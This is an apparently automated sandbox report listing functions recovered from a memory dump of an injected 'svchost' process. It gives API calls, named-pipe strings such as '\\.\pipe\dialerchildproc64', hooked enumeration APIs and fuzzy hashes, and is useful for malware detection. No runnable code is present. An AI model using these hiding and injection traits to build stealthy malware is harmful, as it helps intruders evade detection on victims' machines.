Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: fdb238a54c89558d093bdf46e3e69f66396052a159244fc8cdbab1230f8c34ff
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: 7531B664F30906ABEBC5DF6CEC596D86321E7A7348F804533B6198A961FE38834DC342

Function 000002A3F06623F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 000002A3F0662405
GetCurrentProcessId.KERNEL32 ref: 000002A3F066240F

Part of subcall function 000002A3F06619AC: OpenProcess.KERNEL32 ref: 000002A3F06619CA
Part of subcall function 000002A3F06619AC: IsWow64Process.KERNEL32 ref: 000002A3F06619E0
Part of subcall function 000002A3F06619AC: CloseHandle.KERNEL32 ref: 000002A3F06619FB

CreateFileW.KERNEL32 ref: 000002A3F0662468
WriteFile.KERNEL32 ref: 000002A3F0662490
ReadFile.KERNEL32 ref: 000002A3F06624AF
CloseHandle.KERNEL32 ref: 000002A3F06624B8

Strings

\\.\pipe\dialerchildproc32, xrefs: 000002A3F066243F
\\.\pipe\dialerchildproc64, xrefs: 000002A3F0662438

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: 6fa9dacab57973bc72e64f5d1220d71cc686db30aba163a0f73692ec307a740b
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: 85214435B24B5187F750CB29E94835973A0F39BB95F504225FA5946FA8EF3CC249CB02

Function 000002A3F066104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002A3F06610AB
RegEnumValueW.ADVAPI32 ref: 000002A3F066110E
GetProcessHeap.KERNEL32 ref: 000002A3F0661155
HeapAlloc.KERNEL32 ref: 000002A3F0661163
GetProcessHeap.KERNEL32 ref: 000002A3F0661187
HeapFree.KERNEL32 ref: 000002A3F0661195

Strings

d, xrefs: 000002A3F06610CE

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: 4419e75e1351a038130aef3a1dcd23f1e7ba0082e54820062e16b886cd712548
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: DD417133614B809BE7A0CF55E94439EB7A1F396784F048125EB894BF54EF38C254CB01

Function 000002A3F06675F0 Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002A3F0667618
__scrt_acquire_startup_lock.LIBCMT ref: 000002A3F066766A
_RTC_Initialize.LIBCMT ref: 000002A3F0667698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002A3F06676BE
__scrt_release_startup_lock.LIBCMT ref: 000002A3F06676E9

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: f42c7398ba66d7474313c3f98108a33ba553a3a7ed970e6ddeff39ad48e1ecd8
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 09815B21F346418FFAF0DB2D9C6935D2690E7A7780F144539BA05CBE96FE38CA458702

Function 000002A3EFFC69F0 Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002A3EFFC6A18
__scrt_acquire_startup_lock.LIBCMT ref: 000002A3EFFC6A6A
_RTC_Initialize.LIBCMT ref: 000002A3EFFC6A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002A3EFFC6ABE
__scrt_release_startup_lock.LIBCMT ref: 000002A3EFFC6AE9

Memory Dump Source

Source File: 0000001A.00000002.2679417538.000002A3EFFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3EFFC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3effc0000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 2004662af8488afb19c7b9257792f61ce78e7f6546aa9166802e95a8c65f0e85
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 1981BE61B0826187FB60EB259B493996290EF87780F444127BA0DD3796DFF9CB47870B

Function 000002A3F0669804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32 ref: 000002A3F0669889
GetLastError.KERNEL32 ref: 000002A3F0669897
LoadLibraryExW.KERNEL32 ref: 000002A3F06698C1
FreeLibrary.KERNEL32 ref: 000002A3F0669907
GetProcAddress.KERNEL32 ref: 000002A3F0669913

Strings

api-ms-, xrefs: 000002A3F06698A9

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: a09784815d73b8d83838d560ff30c642aa94032aa2060960fa1566b7bfa2870f
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: 4F31A531B226509AEE91DB1A9C0875D6398F767BA0F590639BD2D8BB40FF38C6458312

Function 000002A3F0671B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteConsoleW.KERNEL32 ref: 000002A3F0671BCD
GetLastError.KERNEL32 ref: 000002A3F0671BD9
CloseHandle.KERNEL32 ref: 000002A3F0671BF1
CreateFileW.KERNEL32 ref: 000002A3F0671C1C
WriteConsoleW.KERNEL32 ref: 000002A3F0671C3B

Strings

CONOUT$, xrefs: 000002A3F0671BFD

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: b32aead9391b7d058d9a649eafb15739b85c12651f3e4705219a4bbe4a528d49
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: 97118E21B24B508BE790CB4AEC4831977A0F3ABFE4F100225FA59C7B94EF38C6048742

Function 000002A3F0665C10 Relevance: 9.2, APIs: 6, Instructions: 240
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000002A3F0665C4B
GetThreadContext.KERNEL32 ref: 000002A3F0665DB5

Part of subcall function 000002A3F0665A40: GetCurrentThreadId.KERNEL32 ref: 000002A3F0665A44

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction ID: 2b3ab92816807bc0e60917e2e37964209f8a8c9b00fa6083a732690c1a02887d
Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction Fuzzy Hash: 09D1BF76614B4886DA70DB09E89535E77B0F3DAB84F100626FA8D87BA5DF39C641CB01

Function 000002A3F06630B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002A3F06630D7
HeapAlloc.KERNEL32 ref: 000002A3F06630EA
StrCmpNIW.SHLWAPI ref: 000002A3F066316B
GetProcessHeap.KERNEL32 ref: 000002A3F06631D1
HeapFree.KERNEL32 ref: 000002A3F06631DF

Strings

dialer, xrefs: 000002A3F0663164

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: 53beae3c5d9a6974889303778d771dfa8311c7940fa334471fc91e29991a7b06
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: 51319821B11B658BE795DF1ADE4826DB3A0FB67784F044030AE498BF54FF38C6658701

Function 000002A3F0661A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000002A3F0661A3A
K32GetModuleFileNameExW.KERNEL32 ref: 000002A3F0661A58
PathFindFileNameW.SHLWAPI ref: 000002A3F0661A67
lstrlenW.KERNEL32 ref: 000002A3F0661A73
StrCpyW.SHLWAPI ref: 000002A3F0661A86
CloseHandle.KERNEL32 ref: 000002A3F0661A94

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: 7fe3758740b57dbea068d10edbfb0c3cd789f7ff2970895ddcfce0f886558fd9
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: 4001C021B20A408BEB90DB16E85C35963A1F79AFC0F884434EE8987B54EE3CCA85C301

Function 000002A3F06637AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000002A3F06637C8
GetCurrentProcess.KERNEL32 ref: 000002A3F06637D6
VirtualProtectEx.KERNEL32 ref: 000002A3F06637F8
GetCurrentProcess.KERNEL32 ref: 000002A3F0663819
VirtualProtectEx.KERNEL32 ref: 000002A3F066383A
TerminateThread.KERNEL32 ref: 000002A3F0663849

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: dac68a6820c259bf305451f9e5c92e6851a0c680b7f667e03f33a9a1c1048ad9
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: EE115E65B217508BFBA0DB29ED0D75A63A0FB6BB45F040438E94987B54FF3CC2088702

Function 000002A3F06690F5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002A3F0669103
_IsNonwritableInCurrentImage.LIBCMT ref: 000002A3F0669198
RtlUnwindEx.NTDLL ref: 000002A3F06691E7

Strings

csm, xrefs: 000002A3F066917E
f, xrefs: 000002A3F0669116

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 13e5ac17999e125e1b6cd133bfc4922bf6558dad679240bf777ad10d916f618b
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: CA517B32B316019BEB94CB19E858B5C739DF367B88F508130AE168BB48EE35DA41C712

Function 000002A3F06690D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002A3F0669103
_IsNonwritableInCurrentImage.LIBCMT ref: 000002A3F0669198
RtlUnwindEx.NTDLL ref: 000002A3F06691E7

Strings

csm, xrefs: 000002A3F066917E
f, xrefs: 000002A3F0669116

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: b4cda61ebdec9d6af21f0db2491c22f5516e65766a65d3aa04192fbdf08795d3
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: E3318B31B206919BE790DF19EC4C71D7799F367B88F148124BE568BB44EE38CA41C716

Function 000002A3F0661AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000002A3F0661AD8
StrCmpNIW.SHLWAPI ref: 000002A3F0661AF2
lstrlenW.KERNEL32 ref: 000002A3F0661B01
StrCpyW.SHLWAPI ref: 000002A3F0661B16

Strings

\\?\, xrefs: 000002A3F0661AE6

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: fe4cc1df9787189f5f2e48a55f0bae5b15bd8df97e3592af6e807e4563c33a73
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: BCF0492172464197E7A0CB19FD983596761F756794F888030EA498AD54FE3DC748C701

Function 000002A3F0663200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 000002A3F0663222
StrCpyW.SHLWAPI ref: 000002A3F0663232
StrCatW.SHLWAPI ref: 000002A3F066323E
PathCombineW.SHLWAPI ref: 000002A3F066324C

Strings

\\.\pipe\, xrefs: 000002A3F0663218

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: d6fbfa9396372c93893d4f7d84835b4603644d806e3cc3c2321924bb1a274a6d
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: 76F05420B2479097EA90CB1BBE1C1195215E75BFD0F044131AD5687F19EE38C7418701

Function 000002A3F066A138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000002A3F066A154
GetProcAddress.KERNEL32 ref: 000002A3F066A16A
FreeLibrary.KERNEL32 ref: 000002A3F066A187

Strings

CorExitProcess, xrefs: 000002A3F066A163
mscoree.dll, xrefs: 000002A3F066A14B

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: c30968bb0355038014303c55fa54c656dc0d3dc86cfe96ef2cef0652a9dcd2f0
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: B4F0F461B316449BFBD4CB68EC8C3695360EB67790F441035B51BC5965EF38C688C702

Function 000002A3F06651B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002A3F0665236

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction ID: 6f03528ed9cd145bc5542155137babb10806ed09f53ae9a93b31eb31b84cf234
Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction Fuzzy Hash: 3902AB36629B808ADBA0CB59E85535EB7A0F3D6794F104125FA8E87B68EF78C544CB01

Function 000002A3F0670860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000002A3F06708A2
GetConsoleMode.KERNEL32 ref: 000002A3F0670960
GetLastError.KERNEL32 ref: 000002A3F06709EA

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: 026cc51e71c301c11f9a8c5f7a1cf4b0cf7ec69a41b3693b4cd269d2025bf81d
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: 78819322F30650CEFB90DB699C583AD27A5F767B84F444125FA0AD7E92FE348645C322

Function 000002A3F06657F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002A3F0665806

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction ID: 65ea948de4f84d53239e2e134d858c5686030f7379511e80b518be24f248bb37
Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction Fuzzy Hash: 62619D36A29644CBEBA0DB59E85931E77A0F396754F100225F68D87FA4EF78C640CB01

Function 000002A3F0671EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000002A3F0671EE0
_set_statfp.LIBCMT ref: 000002A3F0671EFB
_set_statfp.LIBCMT ref: 000002A3F0671F17
_set_statfp.LIBCMT ref: 000002A3F0671F53

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: b2dbd2705c35d06481d9481fe8e3df8efa3160f81306415c9a9b2ce51e0af037
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 2B116D22F74A010BF6D8916CED5E3691180FB77374F144636FA668AAD6EF388B424102

Function 000002A3EFFD12B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000002A3EFFD12E0
_set_statfp.LIBCMT ref: 000002A3EFFD12FB
_set_statfp.LIBCMT ref: 000002A3EFFD1317
_set_statfp.LIBCMT ref: 000002A3EFFD1353

Memory Dump Source

Source File: 0000001A.00000002.2679417538.000002A3EFFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3EFFC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3effc0000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 880a9467df9f9c07d38d590a23ae242536ae50f61415eadc3fb9d76e55d5e56e
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 6111E962B54E01C3F668A365E75E36910406F57374F480627BA76E6BD78EDA8F434203

Function 000002A3F0663878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000002A3F0663886
GetCurrentProcess.KERNEL32 ref: 000002A3F06638B4
VirtualProtectEx.KERNEL32 ref: 000002A3F06638D6
GetCurrentProcess.KERNEL32 ref: 000002A3F06638F4
VirtualProtectEx.KERNEL32 ref: 000002A3F0663915

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: 6b26e9e318ee464f3dbbba6b31a944f535475c7fd0f274aca62906b5695bdb9b
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: 1B113025B24B5087EB94DB29F9186597760F757B84F440139EE8987B54FF3DC604C701

Function 000002A3EFFC84F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002A3EFFC8503
_IsNonwritableInCurrentImage.LIBCMT ref: 000002A3EFFC8598

Strings

f, xrefs: 000002A3EFFC8516
csm, xrefs: 000002A3EFFC857E

Memory Dump Source

Source File: 0000001A.00000002.2679417538.000002A3EFFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3EFFC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3effc0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 7e239ec1dbcb705c68123f9ec3e0a20114bca14b432f71548ff9377122154eb0
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: C851D3323116208BDB14CF15E648B593395FB42F98F528527EA8683788DFB5DF42D70A

Function 000002A3EFFC84D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002A3EFFC8503
_IsNonwritableInCurrentImage.LIBCMT ref: 000002A3EFFC8598

Strings

f, xrefs: 000002A3EFFC8516
csm, xrefs: 000002A3EFFC857E

Memory Dump Source

Source File: 0000001A.00000002.2679417538.000002A3EFFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3EFFC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3effc0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: d6ce20e1202827d93e7641fac24b812cd3e040b3a20ef2aa2f1f722ee3037582
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: F1316B7231166087E714DF11EA4875937A4FB42FA8F16841BBE5A87784CFB9CB42C70A

Function 000002A3F06614B4 Relevance: 6.3, APIs: 5, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002A3F06614D5
HeapFree.KERNEL32 ref: 000002A3F06614E4
GetProcessHeap.KERNEL32 ref: 000002A3F06614F0
HeapFree.KERNEL32 ref: 000002A3F06614FF
GetProcessHeap.KERNEL32 ref: 000002A3F066152A

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

